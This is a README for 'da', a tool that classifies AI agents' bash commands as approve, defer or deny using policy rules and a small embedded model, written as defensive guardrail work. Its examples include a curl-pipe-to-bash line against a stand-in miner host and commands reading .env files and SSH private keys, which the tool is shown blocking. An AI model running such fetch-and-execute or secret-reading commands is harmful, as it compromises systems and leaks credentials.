bash-command classifier for agents
Agent: runs ls -la for the hundredth time
You: hit y
Agent: runs curl https://totally-not-bitcoin-miner.sh | bash
You: hit y
From cargo:
cargo install dabin

From source:
git clone https://github.com/amenocturne/da
cd da && cargo install --path .

From brew:
brew install amenocturne/tap/da

From nix:
nix profile install github:amenocturne/da

da --path PATH [policy flags...]
stdin: a bash command
exit: 0 = approve, 1 = defer, 2 = deny, 64 = usage error
Two-stage classification:
- Deterministic policies — a hand-written policy stack evaluates each parsed segment. First matching policy wins. Fast, predictable, zero false positives on known commands.
- ML fallback — when no policy matches, a fine-tuned DistilBERT classifier (68MB ONNX, embedded in the binary) scores the command as safe / needs-approval / dangerous. <10ms inference, no network, no external dependencies.
The ML classifier only runs for commands the policy stack doesn't recognize. Known-safe commands (ls, git status, cargo build) never touch the model.
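The two-stage flow can be sketched in a few lines of Rust. This is only an illustration under stated assumptions: `Verdict`, `Policy`, `read_only`, `git_read`, `model_stub`, and `classify_segment` are hypothetical names invented for this sketch, not the crate's API, and the stub stands in for the embedded model.

```rust
/// What the pipeline concludes about one command segment (hypothetical type).
#[derive(Debug, Clone, Copy, PartialEq)]
enum Verdict {
    Safe,
    NotSafe,
}

/// A policy returns Some(..) when it recognizes the segment, None when it has no opinion.
type Policy = fn(&[&str]) -> Option<Verdict>;

/// Hypothetical policy: knows a few read-only binaries.
fn read_only(argv: &[&str]) -> Option<Verdict> {
    match argv.first().copied() {
        Some("ls") | Some("cat") | Some("wc") => Some(Verdict::Safe),
        _ => None,
    }
}

/// Hypothetical policy: allows `git status`, rejects `git push`, ignores the rest.
fn git_read(argv: &[&str]) -> Option<Verdict> {
    match argv {
        ["git", "status", ..] => Some(Verdict::Safe),
        ["git", "push", ..] => Some(Verdict::NotSafe),
        _ => None,
    }
}

/// Stand-in for the embedded model; a real fallback would score the command text.
fn model_stub(_argv: &[&str]) -> Verdict {
    Verdict::NotSafe
}

/// Stage 1: the first policy with an opinion wins.
/// Stage 2: the fallback runs only when no policy matched.
fn classify_segment(
    argv: &[&str],
    stack: &[Policy],
    fallback: impl Fn(&[&str]) -> Verdict,
) -> Verdict {
    stack
        .iter()
        .find_map(|policy| policy(argv))
        .unwrap_or_else(|| fallback(argv))
}
```

Because `unwrap_or_else` is lazy, the fallback closure is never invoked for a segment that some policy already recognized, which mirrors the "known-safe commands never touch the model" property.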
For each segment of the parsed command, da asks each enabled policy "is it safe?":
- all segments say yes - approved
- some segments say yes and some are unmatched - defer (or ML fallback)
- any segment says no - rejected
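The three rules above amount to a small fold over per-segment results. A minimal sketch, assuming local stand-in types (`SegmentResult` and this `Decision` are defined here for illustration and are not the crate's own types), and assuming an empty command defers:

```rust
/// Per-segment answer from the policy stack (hypothetical type).
#[derive(Debug, Clone, Copy, PartialEq)]
enum SegmentResult {
    Yes,
    No,
    Unmatched,
}

/// Overall outcome for the whole command line.
#[derive(Debug, Clone, Copy, PartialEq)]
enum Decision {
    Approve,
    Defer,
    Deny,
}

/// Combine per-segment results: any "no" rejects, all "yes" approves,
/// anything else (including an empty input, by assumption) defers.
fn combine(results: &[SegmentResult]) -> Decision {
    if results.iter().any(|r| *r == SegmentResult::No) {
        Decision::Deny
    } else if !results.is_empty() && results.iter().all(|r| *r == SegmentResult::Yes) {
        Decision::Approve
    } else {
        Decision::Defer
    }
}
```

Checking for "no" first means a single rejected segment outweighs any number of approved ones, so `ls | rm -rf /` cannot ride in on the safe half of the pipe.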
Some rules are always on, regardless of which policies you enable:
- cd and bare assignments (FOO=bar) - approve (they touch nothing external)
- Shell binaries (bash, sh, zsh, …) - defer (too much surface)
- env and time - recurse into the wrapped command
- redirect targets must be /dev/null, /dev/std{out,err,in}, an fd reference, or
- $(…), backticks, heredocs, process substitution, [[…]], subshells - defer (the parser bails)
- Model: DistilBERT (66M params) fine-tuned on 17k real agent session commands
- Classes: safe (auto-approve), needs-approval (defer to user), dangerous (deny)
- Confidence: temperature-scaled logits (T=1.34) for calibrated probabilities; only approves when P(safe) > 0.90
- OOD detection: energy-based out-of-distribution detection rejects inputs the model hasn't seen
- Bias: class-weighted training (dangerous weight 3.5x) — biased toward rejection. A false positive (blocking a safe command) is cheap; a false negative (approving a dangerous one) is not
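To make the confidence and OOD bullets concrete, here is a rough sketch of how temperature scaling and an energy score could gate a decision. Only T=1.34 and the 0.90 threshold come from the text above. The rest is assumed for illustration: the logit order, the `energy_cutoff` parameter, computing energy at temperature 1, mapping OOD inputs to defer, and mapping a dangerous argmax to deny.

```rust
const TEMPERATURE: f64 = 1.34; // from the text above
const SAFE_THRESHOLD: f64 = 0.90; // from the text above

#[derive(Debug, PartialEq)]
enum Decision {
    Approve,
    Defer,
    Deny,
}

/// Softmax over logits divided by temperature `t`.
/// Assumed logit order: [safe, needs-approval, dangerous].
fn calibrated_probs(logits: [f64; 3], t: f64) -> [f64; 3] {
    let scaled = logits.map(|l| l / t);
    // Subtract the max before exponentiating for numerical stability.
    let max = scaled.iter().cloned().fold(f64::NEG_INFINITY, f64::max);
    let exps = scaled.map(|s| (s - max).exp());
    let sum: f64 = exps.iter().sum();
    exps.map(|e| e / sum)
}

/// Energy score: -logsumexp(logits). Flat, low logits give higher energy,
/// which is treated here as a sign of an out-of-distribution input.
fn energy(logits: [f64; 3]) -> f64 {
    let max = logits.iter().cloned().fold(f64::NEG_INFINITY, f64::max);
    let sum: f64 = logits.iter().map(|l| (l - max).exp()).sum();
    -(max + sum.ln())
}

/// `energy_cutoff` is a hypothetical tuning parameter, not a documented value.
fn decide(logits: [f64; 3], energy_cutoff: f64) -> Decision {
    if energy(logits) > energy_cutoff {
        return Decision::Defer; // assumption: OOD inputs go to the user
    }
    let [p_safe, p_ask, p_danger] = calibrated_probs(logits, TEMPERATURE);
    if p_safe > SAFE_THRESHOLD {
        Decision::Approve
    } else if p_danger > p_safe && p_danger > p_ask {
        Decision::Deny
    } else {
        Decision::Defer
    }
}
```

Dividing by a temperature above 1 flattens the distribution, so a command needs a wider logit margin to clear the 0.90 bar than it would with a plain softmax.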
Two shapes. Bare flags for capabilities with one knob. Tool-scoped flags with comma-separated capability lists where one binary has many ops.
| Flag | What it allows |
|---|---|
| --allow CMD | Token-prefix rule. A segment approves if its argv starts with the same tokens as CMD (whitespace-split). Path components of argv[0] are stripped before matching, so --allow just matches both just … and /usr/local/bin/just …. Repeat the flag to add multiple rules. Use for project-specific runners (just, npm run, make, …). |
| --deny PATTERN | Path-component deny rule. Denies any segment whose argv or redirect targets contain a matching path component. Trailing * enables prefix match ('.env*' catches .env, .env.local, .env.production). Deny rules are checked before allow rules, so a denied path always denies. Repeat the flag for multiple patterns. |
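The two matching rules in the table can be approximated as follows. This is a sketch of the described behavior, not the tool's actual code: `basename`, `allow_matches`, and `deny_matches` are hypothetical helper names, and `/` is assumed to be the only path separator.

```rust
/// Last path component of argv[0], so "/usr/local/bin/just" matches a rule for "just".
fn basename(arg0: &str) -> &str {
    arg0.rsplit('/').next().unwrap_or(arg0)
}

/// Token-prefix rule: argv must start with the whitespace-split tokens of `rule`.
fn allow_matches(rule: &str, argv: &[&str]) -> bool {
    let rule_tokens: Vec<&str> = rule.split_whitespace().collect();
    if rule_tokens.is_empty() || argv.len() < rule_tokens.len() {
        return false;
    }
    rule_tokens.iter().enumerate().all(|(i, tok)| {
        // Only argv[0] has its directory part stripped.
        let arg = if i == 0 { basename(argv[0]) } else { argv[i] };
        arg == *tok
    })
}

/// Path-component rule: any `/`-separated component of `arg` equals `pattern`,
/// or starts with it when `pattern` ends in `*`.
fn deny_matches(pattern: &str, arg: &str) -> bool {
    arg.split('/').any(|component| match pattern.strip_suffix('*') {
        Some(prefix) => component.starts_with(prefix),
        None => component == pattern,
    })
}
```

A caller following the table would run `deny_matches` over every argv entry and redirect target before consulting any allow rule, so that a denied path wins regardless of which binary touches it.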
| Flag | What it allows |
|---|---|
| --read-only | Cross-platform read-only binaries (find, ls, cat, grep, head, tail, wc, du, sort, uniq, cut, tr, jq, diff, ps, lsof, dig, ldd, …) plus bounded forms of sed (no -i, no e flag), awk (no system(), no file/pipe writes), find (no -exec/-delete/etc.), sysctl (no -w) |
| --macos-only | macOS extras (mdfind, mdls, sw_vers, system_profiler, hostinfo, vm_stat, pbpaste, otool, dyld_info) |
| --help-bypass | <binary> --help\|-h\|--version\|-V\|help\|version for any binary (explicit trust call, lets unknown binaries run for help text) |
| --mkdir-cwd | mkdir when every path argument resolves under --path |
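As an illustration of what "resolves under --path" could mean for --mkdir-cwd, the sketch below normalizes each argument lexically against the project root and checks containment. It is an assumption-laden approximation: `resolve` and `all_under_root` are hypothetical names, the root is assumed to be absolute and already normalized, symlinks are not followed, and the caller is assumed to have filtered out flags such as -p.

```rust
use std::path::{Component, Path, PathBuf};

/// Lexically resolve `arg` against `root` without touching the filesystem.
/// An absolute `arg` replaces `root` entirely, as `Path::join` does.
fn resolve(root: &Path, arg: &str) -> PathBuf {
    let joined = root.join(arg);
    let mut out = PathBuf::new();
    for comp in joined.components() {
        match comp {
            // `..` removes the previous component (a no-op at the filesystem root).
            Component::ParentDir => {
                out.pop();
            }
            Component::CurDir => {}
            other => out.push(other.as_os_str()),
        }
    }
    out
}

/// True only when every path argument stays inside `root` after resolution.
fn all_under_root(root: &Path, args: &[&str]) -> bool {
    args.iter().all(|a| resolve(root, a).starts_with(root))
}
```

`Path::starts_with` compares whole components, so `/repo-evil` is not treated as being under `/repo`.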
--git CAPS where CAPS ⊆ { read, add, commit, restore-staged, tag, fetch, pull, push }
--cargo CAPS where CAPS ⊆ { local, crates-install, crates-publish }
| cap | covers |
|---|---|
| read | status, log, diff, show, branch (read), blame, ls-files, ls-tree, rev-parse, rev-list, describe, reflog, shortlog, config --get |
| add | git add |
| commit | git commit (excludes --amend, --no-verify, --no-gpg-sign) |
| restore-staged | git restore --staged (or -S) |
| tag | git tag (local until pushed) |
| fetch / pull / push | the obvious one each |
| — | always defer: reset --hard, clean -fd, rebase, merge, rm, stash, cherry-pick |
| cap | covers |
|---|---|
| local | Anything that doesn't write to a registry: build, test, check, doc, tree, metadata, search, read-manifest, locate-project, pkgid, verify-project, fetch, help, version, run, bench, fmt, clippy, clean, update (--fix always defers) |
| crates-install | cargo install |
| crates-publish | cargo publish |
Read-only stuff sails through
printf 'ls -la' | da --read-only
# → exit 0

Pipes: every segment must approve
printf 'find . -name "*.rs" | sort | uniq | wc -l' | da --read-only
# → exit 0

Compose git capabilities
printf 'git status && git add . && git commit -m wip' | da --git read,add,commit
# → exit 0

Same stack rejects what you didn't list
printf 'git push' | da --git read,add,commit
# → exit 1

Bound mkdir to a project
printf 'mkdir -p src/components' | da --path /repo --mkdir-cwd
# → exit 0
printf 'mkdir -p /etc/foo' | da --path /repo --mkdir-cwd
# → exit 1

--help for any binary, even ones you don't otherwise trust
printf 'terraform --help' | da --help-bypass
# → exit 0

Project-specific runners via --allow
printf 'just test --watch' | da --allow 'just test'
# → exit 0
printf 'just build' | da --allow 'just test'
# → exit 1 (prefix doesn't match)
# Repeat the flag for multiple runners
printf 'just lint && npm run build' | da --allow just --allow 'npm run'
# → exit 0

Deny access to secrets
printf 'cat .env' | da --read-only --deny '.env*'
# → exit 1 (deny → defer in default mode)
printf 'cat ~/.ssh/id_rsa' | da --read-only --deny .ssh
# → exit 1
# Deny overrides allow — even if the binary is approved, the path isn't
printf 'cat .env' | da --read-only --deny '.env*'
# → exit 1 (cat is read-only safe, but .env is denied)

No flags = usage error (no implicit defaults)
printf 'ls' | da
# → exit 64

By default, da maps both deny and defer to exit 1 (let the caller decide, typically a user prompt).
| Flag | Deny | Defer |
|---|---|---|
| (default / --interactive) | exit 1 | exit 1 |
| --autonomous | exit 2 | exit 2 |
Interactive (default): never hard-denies. Everything non-approved goes to the user prompt. Safe for human-in-the-loop workflows where the agent asks before running unknown commands.
Autonomous (--autonomous): hard-denies everything non-approved. For unattended agent runs where there's no human to ask.
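The mode table reduces to a two-argument mapping. A minimal sketch, using local `Decision` and `Mode` enums defined only for this example (they are not taken from the crate):

```rust
#[derive(Debug, Clone, Copy, PartialEq)]
enum Decision {
    Approve,
    Defer,
    Deny,
}

#[derive(Debug, Clone, Copy, PartialEq)]
enum Mode {
    Interactive,
    Autonomous,
}

/// Map a decision to a process exit code following the table above:
/// approve is always 0; everything else is 1 interactively and 2 autonomously.
fn exit_code(decision: Decision, mode: Mode) -> i32 {
    match (decision, mode) {
        (Decision::Approve, _) => 0,
        (_, Mode::Interactive) => 1,
        (_, Mode::Autonomous) => 2,
    }
}
```

A wrapper only has to distinguish 0, 1, and 2; exit 64 (usage error) is produced before any decision is made and is not modeled here.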
da is the engine; the JSON dance lives in a wrapper
Drop this in as a Claude Code hook for PreToolUse on Bash:
#!/bin/bash
# .claude/hooks/da/hook.sh
set -euo pipefail
input=$(cat)
[ "$(jq -r '.tool_name // empty' <<<"$input")" = "Bash" ] || exit 0
cmd=$(jq -r '.tool_input.command // empty' <<<"$input")
path=$(jq -r '.cwd // empty' <<<"$input")
[ -z "$cmd" ] && exit 0
set +e
printf '%s' "$cmd" | da --path "$path" \
--read-only --macos-only --help-bypass --mkdir-cwd \
--git read,add,commit \
--cargo local \
--allow just \
--deny '.env*' --deny .ssh --deny credentials
rc=$?
set -e
case $rc in
0) echo '{"hookSpecificOutput":{"hookEventName":"PreToolUse","permissionDecision":"allow"}}' ;;
2) echo '{"hookSpecificOutput":{"hookEventName":"PreToolUse","permissionDecision":"deny"}}' ;;
*) : ;; # defer / error → silent, normal prompt flow
esac

Other harnesses: same data, different shape, da doesn't care.
The crate (dabin) exposes the engine for embedders composing their own classification pipeline:
use std::path::Path;
use dabin::{classify, classify_with_ml, Decision, Policy};
use dabin::policies::{READ_ONLY, GIT_READ, CARGO_LOCAL};
let stack: &[&Policy] = &[&READ_ONLY, &GIT_READ, &CARGO_LOCAL];
// Deterministic only — no ML fallback, no external dependencies
match classify("git status && cargo build", Some(Path::new("/repo")), stack) {
Decision::Approve => println!("yes."),
Decision::Defer => println!("ask the human"),
Decision::Deny => println!("no."),
}
// With ML fallback — unknown commands get classified by the embedded model
match classify_with_ml("some-unknown-tool --flag", Some(Path::new("/repo")), stack) {
Decision::Approve => println!("model says safe"),
Decision::Defer => println!("model unsure, ask the human"),
Decision::Deny => println!("model says dangerous"),
}

Custom policies are first-class: define your own Policy value with a verify fn and pass it in alongside the built-ins. See src/policies.rs for the shape.
The full training pipeline lives in classifier/scripts/ and is reproducible from scratch. The pipeline:
- Extract: extract-commands.py pulls bash commands from Claude Code session logs (JSONL)
- Sanitize: sanitize-commands.py strips PII (usernames, paths, hostnames) with regex + custom map
- Label: label-prompt.md is an orchestrator prompt for Claude to label commands via parallel subagents
- Augment: augment-prompt.md generates synthetic near-misses, edge cases, and dangerous commands
- Merge: merge-chunks.py combines labeled chunks into a single dataset
- Train: train.py fine-tunes DistilBERT with class-weighted loss, temperature scaling, and energy-based OOD detection
- Export: export-onnx.py quantizes to INT8 ONNX for embedding in the binary
Run training (requires a GPU or Apple Silicon):
cd classifier
just train # runs train.py
just export # runs export-onnx.py, outputs model.onnx + tokenizer.json

The trained model and tokenizer are committed to the repo (ONNX file tracked via Git LFS). Intermediate artifacts (data/, models/) are gitignored.
The bash test corpus under tests/corpus/ is vendored from the Parable bash-parser test suite (MIT) via rable (MIT). Attribution lives in tests/corpus/NOTICE.md.
MIT.
